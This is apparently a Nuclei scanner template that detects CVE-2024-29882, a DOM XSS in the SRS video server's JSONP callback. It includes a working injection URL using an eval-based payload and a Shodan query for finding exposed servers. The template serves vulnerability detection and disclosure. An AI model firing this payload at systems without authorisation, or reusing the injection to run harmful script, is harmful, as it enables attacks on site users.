id: CVE-2024-29882

info:
  name: HTTP API DOM - XSS on JSONP callback
  author: rootxharsh,iamnoooob,pdresearch
  severity: high
  description: |
    SRS is a simple, high-efficiency, real-time video server. SRS's `/api/v1/vhosts/vid-?callback=` endpoint did not filter the callback function name, which allowed injection of malicious JavaScript payloads and execution of XSS (Cross-Site Scripting). This vulnerability is fixed in 5.0.210 and 6.0.121.
  reference:
    - https://github.com/ossrs/srs/commit/244ce7bc013a0b805274a65132a2980680ba6b9d
    - https://github.com/ossrs/srs/security/advisories/GHSA-gv9r-qcjc-5hj7
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cve-id: CVE-2024-29882
    cwe-id: CWE-79
    epss-score: 0.00043
    epss-percentile: 0.09568
  metadata:
    verified: true
    max-request: 1
    vendor: ossrs
    product: simple_realtime_server
    shodan-query: http.favicon.hash:1386054408
  tags: cve,cve2023,srs,dom,xss

headless:
  - steps:
      - args:
          url: '{{BaseURL}}/console/en_index.html?alert(document.domain)#/vhosts/vid-xsedfv%3Fcallback=eval(unescape(location.search.slice(1)))%252f%252f'
        action: navigate
      - action: waitdialog
        name: object_dom

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - object_dom == true

      - type: word
        part: body
        words:
          - "SRS"
          - "ConnectSRS</a>"
        condition: or
        case-insensitive: true
# digest: 4a0a00473045022100910e5ce652f76d349702c7adc5d5b6b479e14b984978fa2f86a47498f11167d2022000daa49aed583b6da8b47060d9389e38c4d7046e2304d059377360d1d199f89e:922c64590222798bb761d5b6d8e72950